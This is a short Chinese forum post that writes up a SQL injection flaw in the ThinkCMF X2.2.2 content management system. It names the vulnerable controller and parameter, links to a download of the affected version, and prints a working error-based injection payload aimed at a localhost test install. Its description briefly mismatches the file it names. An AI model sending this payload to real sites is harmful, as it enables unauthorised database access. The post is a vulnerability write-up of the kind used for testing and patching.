ThinkCMF是一套基于ThinkPHP的CMS(内容管理系统)。
ThinkCMF X2.2.2版本中存在SQL注入漏洞。远程攻击者可借助ArticleController.class.php文件的edit_post方法利用该漏洞执行SQL命令。
ThinkCMFX2.2.2下载链接:https://pan.baidu.com/s/1rK1-_BLmH1VPXsIUfr1VUw 提取码:wuhw
检测点击下一步
该漏洞位于.62行的check/delete方法中/application/Comment/Controller/CommentadminController.class.php,$_POST[‘ids’]参数在join()函数后传递给where语句,但没有使用inwhere子句的方法,而是直接拼接到SQL语句中,导致SQL注入。该漏洞需要管理员
Payload:
http: //127.0.0.1/cmfx/index.php?g=Comment&m=commentadmin&a=check&check=1
POST : ids[]= 1 &ids[]= 2 and updatexml ( 1 , concat ( 0x7e ,( SELECT user()) ) , 0x7e ), 1 )
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-聂风 | 35.00 | 0 | 2021-10-29 16:04:53 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.